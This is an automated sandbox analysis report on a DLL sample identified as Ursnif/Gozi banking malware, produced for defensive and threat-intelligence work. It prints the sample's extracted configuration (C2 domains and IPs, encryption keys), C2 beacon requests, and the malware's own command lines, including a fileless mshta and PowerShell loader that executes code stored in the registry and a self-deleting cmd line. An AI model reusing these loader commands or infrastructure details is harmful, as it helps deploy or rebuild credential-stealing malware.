Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zs5n5sI6N2

Overview

General Information

Sample Name:zs5n5sI6N2 (renamed file extension from none to dll)
Analysis ID:633919
MD5:9ce6868cb546819a7ba2fc27f91a3777
SHA1:6052120b0375f44ede4985ad98f7bd89beb70c2b
SHA256:fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959
Tags:dllGoziITAursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3456 cmdline: loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4452 cmdline: rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6364 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 260 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 5988 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 2960 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6732 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.4b794a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.4b794a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.1000000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.5246b48.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.52194a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.413.107.42.1649765802033203 05/25/22-11:27:05.996967
                      SID:2033203
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.413.107.42.1649765802033204 05/25/22-11:27:05.996967
                      SID:2033204
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.4176.10.119.6849771802033203 05/25/22-11:27:28.182548
                      SID:2033203
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.4176.10.119.6849771802033204 05/25/22-11:27:27.011665
                      SID:2033204
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: zs5n5sI6N2.dllReversingLabs: Detection: 41%
                      Antivirus detection for URL or domain
                      Source: http://176.10.119.68/Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pBAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftcoAvira URL Cloud: Label: phishing
                      Machine Learning detection for sample
                      Source: zs5n5sI6N2.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01005FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_01005FBB
                      Source: zs5n5sI6N2.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.283526713.000000000040D000.00000002.00000001.01000000.00000003.sdmp, zs5n5sI6N2.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_05B665C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_05B699BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05B7BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05B6FD47

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49765 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49765 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49771 -> 176.10.119.68:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49771 -> 176.10.119.68:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/
                      Source: rundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ
                      Source: rundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco
                      Source: rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB
                      Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/MhUMoFyOZh9qYvrOpwdPHz/hMGU1NSaMibeb/gbf3D
                      Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/MhUMoFyOZh9qYvrOpwdPHz/hMGU1NSaMibeb/gbf3DosK/m_2FDcmJcUXkMB1YR9WE
                      Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000019.00000003.464926394.0000020923589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01001CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_01001CA5
                      Source: global trafficHTTP traffic detected: GET /drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
